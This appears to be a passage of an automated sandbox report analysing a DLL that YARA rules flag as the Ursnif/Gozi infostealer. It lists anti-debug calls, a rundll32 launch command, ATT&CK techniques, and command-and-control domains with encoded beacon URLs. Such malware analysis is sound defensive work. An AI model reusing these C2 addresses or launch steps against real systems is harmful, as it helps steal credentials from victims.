                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: WerFault.exe, 00000010.00000002.594844091.0000000005290000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWX
                      Source: rundll32.exe, 00000003.00000002.828429749.0000000002C1A000.00000004.00000020.sdmp, WerFault.exe, 00000010.00000002.594924398.00000000052E2000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000002.605872218.0000000004B13000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                      Source: rundll32.exe, 00000003.00000003.710966842.0000000002C72000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWen-USn
                      Source: WerFault.exe, 0000000D.00000002.591098165.0000000004CA2000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E806CB3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E7C1DE5 LoadLibraryA,GetProcAddress,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E81C325 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E828861 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E86DFDA mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E86DEAA mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E86DBB5 push dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E81C325 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E828861 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E86DFDA mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E86DEAA mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E86DBB5 push dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6952 -s 640
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E806CB3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E7FB316 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E806CB3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E7FB316 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: www.msn.com
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: areuranel.website
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 40.97.161.50 187
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: breuranel.website
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: outlook.office365.com
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: msn.com
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 52.97.151.2 187
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: outlook.com
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: www.outlook.com
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 13.82.28.61 187
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 52.97.151.66 187
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\m87xfb63XU.dll',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6952 -s 640
                      Source: loaddll32.exe, 00000000.00000002.827633044.0000000001500000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.541716339.0000000003190000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.829291690.00000000030A0000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.562409150.0000000002BC0000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000000.551988515.0000000002C30000.00000002.00020000.sdmpBinary or memory string: Program Manager
                      Source: loaddll32.exe, 00000000.00000002.827633044.0000000001500000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.541716339.0000000003190000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.829291690.00000000030A0000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.562409150.0000000002BC0000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000000.551988515.0000000002C30000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: loaddll32.exe, 00000000.00000002.827633044.0000000001500000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.541716339.0000000003190000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.829291690.00000000030A0000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.562409150.0000000002BC0000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000000.551988515.0000000002C30000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: loaddll32.exe, 00000000.00000002.827633044.0000000001500000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.541716339.0000000003190000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.829291690.00000000030A0000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.562409150.0000000002BC0000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000000.551988515.0000000002C30000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoW,
                      Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoW,
                      Source: C:\Windows\System32\loaddll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\System32\loaddll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\System32\loaddll32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
                      Source: C:\Windows\System32\loaddll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\System32\loaddll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\System32\loaddll32.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,
                      Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00C4A82B cpuid
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E7C1172 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E81FF15 _free,_free,_free,GetTimeZoneInformation,_free,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E7C1825 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00C4A82B RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000003.00000002.829711196.0000000004CD0000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.573182276.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.575886663.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.577592974.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.577142287.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.621678183.0000000004F4B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.574590732.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.573615076.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.828440646.00000000030D0000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.574198555.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.573998703.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.576726243.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.619056224.000000000334B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.577395162.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.578289206.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.576921901.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.573750690.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.573091337.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.707612619.000000000314F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.574533141.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.711256543.0000000004D4F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.576829931.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.664577952.000000000324D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.667981816.0000000004E4D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.577047375.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.576567742.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6444, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4352, type: MEMORYSTR
                      Source: Yara matchFile source: 2.3.rundll32.exe.2f3a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.2f194a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.2f3a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.d5a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.68a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.4da31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.49494a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.68a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.c40000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.6e7c0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.49494a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.d5a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.8da31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.8da31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.4da31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.2f194a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.8f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.6e7c0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.828285916.0000000002F19000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.512556680.0000000000D50000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.492597168.00000000008D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.829472336.0000000004949000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.512003320.00000000004D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.506220086.0000000000680000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.492790466.0000000002F30000.00000040.00000001.sdmp, type: MEMORY

                      Remote Access Functionality:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000003.00000002.829711196.0000000004CD0000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.573182276.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.575886663.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.577592974.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.577142287.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.621678183.0000000004F4B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.574590732.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.573615076.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.828440646.00000000030D0000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.574198555.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.573998703.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.576726243.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.619056224.000000000334B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.577395162.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.578289206.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.576921901.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.573750690.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.573091337.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.707612619.000000000314F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.574533141.00000000034C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.711256543.0000000004D4F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.576829931.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.664577952.000000000324D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.667981816.0000000004E4D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.577047375.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.576567742.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6444, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4352, type: MEMORYSTR
                      Source: Yara matchFile source: 2.3.rundll32.exe.2f3a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.2f194a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.2f3a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.d5a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.68a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.4da31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.49494a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.68a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.c40000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.6e7c0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.49494a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.d5a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.8da31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.8da31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.4da31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.2f194a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.8f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.6e7c0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.828285916.0000000002F19000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.512556680.0000000000D50000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.492597168.00000000008D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.829472336.0000000004949000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.512003320.00000000004D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.506220086.0000000000680000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.492790466.0000000002F30000.00000040.00000001.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation2Path InterceptionProcess Injection112Disable or Modify Tools1OS Credential DumpingSystem Time Discovery2Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsNative API1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion1LSASS MemorySecurity Software Discovery21Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection112Security Account ManagerVirtualization/Sandbox Evasion1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information1NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol14SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information2LSA SecretsAccount Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonRundll321Cached Domain CredentialsSystem Owner/User Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemSystem Information Discovery23Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 500399 Sample: m87xfb63XU.dll Startdate: 12/10/2021 Architecture: WINDOWS Score: 88 33 outlook.com 2->33 47 Found malware configuration 2->47 49 Multi AV Scanner detection for submitted file 2->49 51 Yara detected  Ursnif 2->51 8 loaddll32.exe 1 2->8         started        signatures3 process4 dnsIp5 41 breuranel.website 8->41 43 areuranel.website 8->43 45 9 other IPs or domains 8->45 55 Writes or reads registry keys via WMI 8->55 57 Writes registry values via WMI 8->57 12 rundll32.exe 8->12         started        15 cmd.exe 1 8->15         started        17 rundll32.exe 8->17         started        19 rundll32.exe 8->19         started        signatures6 process7 signatures8 59 System process connects to network (likely due to code injection or exploit) 12->59 61 Writes registry values via WMI 12->61 21 WerFault.exe 23 9 12->21         started        23 rundll32.exe 15->23         started        27 WerFault.exe 9 17->27         started        29 WerFault.exe 17->29         started        31 WerFault.exe 2 9 19->31         started        process9 dnsIp10 35 52.97.151.2, 443, 49797 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 23->35 37 breuranel.website 23->37 39 10 other IPs or domains 23->39 53 System process connects to network (likely due to code injection or exploit) 23->53 signatures11

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      m87xfb63XU.dll22%ReversingLabsWin32.Infostealer.Gozi

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      3.2.rundll32.exe.8f0000.0.unpack100%AviraHEUR/AGEN.1108168Download File
                      0.2.loaddll32.exe.c40000.0.unpack100%AviraHEUR/AGEN.1108168Download File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://breuranel.website/liopolo/wv4vNBBA798s7/I_2FCPxa/4F4kPL6kvjyV14SrT2YW8wi/GOKS69LDnM/P4sY8Z0h0%Avira URL Cloudsafe
                      https://breuranel.website/0%Avira URL Cloudsafe
                      http://docs.oasis-op0%Avira URL Cloudsafe
                      https://deff.nelreports.net/api/report?cat=msn0%URL Reputationsafe
                      https://areuranel.website/liopolo/C_2BfXb0gV5jtbUa/IZmGbVhjqtQp_2F/7qZce0oXF332X4bIP1/uoX46bOOY/izB10%Avira URL Cloudsafe
                      https://mem.gfx.ms/meversion/?partner=msn&market=en-us"0%Avira URL Cloudsafe
                      https://breuranel.website/liopolo/53U65wbAztycwApkbN/Nm6o3zX96/bvCraxUdm00FZ4WM5Wps/p_2FNPk5Ls6JTWqI0%Avira URL Cloudsafe
                      https://areuranel.website/#0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      msn.com
                      		13.82.28.61
                      		truefalse
                        		high
                        outlook.com
                        		40.97.161.50
                        		truefalse
                          		high
                          HHN-efz.ms-acdc.office.com
                          		40.101.60.226
                          		truefalse
                            		high
                            FRA-efz.ms-acdc.office.com
                            		52.97.151.66
                            		truefalse
                              		high
                              www.msn.com
                              		unknown
                              		unknownfalse
                                		high
                                www.outlook.com
                                		unknown
                                		unknownfalse
                                  		high
                                  areuranel.website
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    breuranel.website
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      outlook.office365.com
                                      		unknown
                                      		unknownfalse
                                        		high

                                        Contacted URLs

                                        NameMaliciousAntivirus DetectionReputation
                                        https://www.outlook.com/signup/liopolo/_2F1953bLKh6Aa9Zni5pUB/uu476XRXRXdwS/zStiAL1i/ws5BIrlWLA2GdJ9e0xq88Zi/DBztcvZHmo/mcGQqmXKrqNjP4iG6/7aTDT9GSE9D6/8jXJ0EFBBnJ/89lvGSm0UsN_2B/DpWUyWVECg62e9A86zQtW/yv5TQxo2fX2Xv7gp/5xHugEiGC5l_2Bc/jIp0JWV7N33_2F/EkcA.jrefalse
                                          		high
                                          https://outlook.office365.com/signup/liopolo/_2F1953bLKh6Aa9Zni5pUB/uu476XRXRXdwS/zStiAL1i/ws5BIrlWLA2GdJ9e0xq88Zi/DBztcvZHmo/mcGQqmXKrqNjP4iG6/7aTDT9GSE9D6/8jXJ0EFBBnJ/89lvGSm0UsN_2B/DpWUyWVECg62e9A86zQtW/yv5TQxo2fX2Xv7gp/5xHugEiGC5l_2Bc/jIp0JWV7N33_2F/EkcA.jrefalse
                                            		high
                                            https://msn.com/mail/liopolo/r_2FdFpkR4VdtsN08a/_2BmiRrdo/iRPVi0tWAScg5sVGfo66/hUF_2BDb_2BTvse5vT2/OGVc4TNxI8ONXMjzPJH1kn/iiKryEX2ymN0T/2YX_2Bs_/2FUMTLKLdgRo4Z6EcuiEOOc/8fsAz5_2Fq/UDZOXONJb9G0Jl7Sh/YwJHU3HBZfrx/Rr2RrnGmK6E/ePg9xCsP_2FGO_/2FHvWeMzr/F7gd5.jrefalse
                                              		high
                                              https://msn.com/mail/liopolo/QXqV1Cwmdgy9RAxuvo/eyRDOSF4h/n5Xdvl6macAzIHUi6g_2/FnMxm3OFSbW9k15b3rD/GOZ7HTzmadDT3EaU6FMaux/8v8OfzSGDIfuI/2JFzbGpa/48oXcRIDJ4CWvryCIOce07l/PRm5ekLf_2/FWrUO776bg5a24LJQ/ndIkg4SZse4c/jL7OG2Z00xG/sTPur68E_2BxS_/2FjGzTP4SxNpm_2FiKI7j/WPoFKl4.jrefalse
                                                		high
